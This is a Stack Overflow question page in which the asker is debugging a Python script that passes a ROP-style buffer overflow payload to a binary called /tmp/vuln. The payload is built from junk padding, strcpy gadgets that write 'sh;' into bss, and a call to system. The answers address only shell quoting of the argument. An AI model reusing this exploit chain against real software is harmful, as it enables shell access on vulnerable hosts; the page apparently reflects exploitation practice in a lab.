current community

your communities

more stack exchange communities

Stack Exchange
tour help
stack overflow careers
Take the 2-minute tour ×
Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free, no registration required.
up vote 0 down vote favorite

I am trying to execute a c program with an input string argument on a python script. But I am getting a type error.

p -> is a string variable vuln -> is a c binary that I can execute fine using the terminal

This is the line that is giving the error:

system("/tmp/vuln\""+p+"\"")

TypeError: system() argument 1 must be string without null bytes, not str

Thanks

Update:This is the complete code

#!/usr/bin/python

from struct import pack
from os import system

junk = 'A'*1036 #junk to offset to stored ret
strcpy = pack("<L", 0x0016bf60) #system - 0x10
ppr = pack("<L", 0x080483c2) #pop pop ret

p = junk
p += strcpy
p += ppr
p += pack("<L", 0x0804969c) #bss
p += pack("<L", 0x08048142) # 's'
p += strcpy
p += ppr
p += pack("<L", 0x0804969d) #bss+1
p += pack("<L", 0x080482fa) # 'h'
p += strcpy
p += ppr
p += pack("<L", 0x0804969f) #bss+2
p += pack("<L", 0x080484ff) # ';'
p += pack("<L", 0x0016bf70) #system
p += "AAAA"
p += pack("<L", 0x0804969c) #bss (now contains "sh;<junk>")

system("/tmp/vuln " + p)
share|improve this question
    
Use python's other quoting character ' and you need a space after vuln. Using format is cleaner system('/tmp/vuln "{}"'.format(p)) –  achampion yesterday

2 Answers 2

up vote 0 down vote

You don't need the escaped double-quotes.

system("/tmp/vuln " + p) # note the space before the ending quote

should work fine.

Please note that if you'd like to read output from vuln, or interact with it in any way, you'd be much better off using the subprocess module.

share|improve this answer
up vote 0 down vote

Your input string is all messed up

system("/tmp/vuln " + p)

The extra backspaces are escape characters, and you do not want those here

share|improve this answer
    
he may need p quoted in order for it to be treated as a single argument to vuln, but you can always use ' - '/tmp/vuln "{}"'.format(p) –  achampion yesterday
    
If P is a string, there is no reason for him to do any for formatting. –  AndrewGrant yesterday
    
The underlying shell may need the quotes, e.g. to create a file called "hello world" would need touch "hello world", so this would mean you need the quotes to system, e.g. p = "hellow world"; system('touch "{}".format(p)) –  achampion yesterday
    
The argument inside system() will be created by concatenating the two strings before the function system it called. –  AndrewGrant yesterday
    
Try it... system('touch hello world') touches two files one called hello the other called world however, system('touch "hello world"') touches a single file called hello world. –  achampion yesterday

Your Answer

 
discard

By posting your answer, you agree to the privacy policy and terms of service.

Not the answer you're looking for? Browse other questions tagged or ask your own question.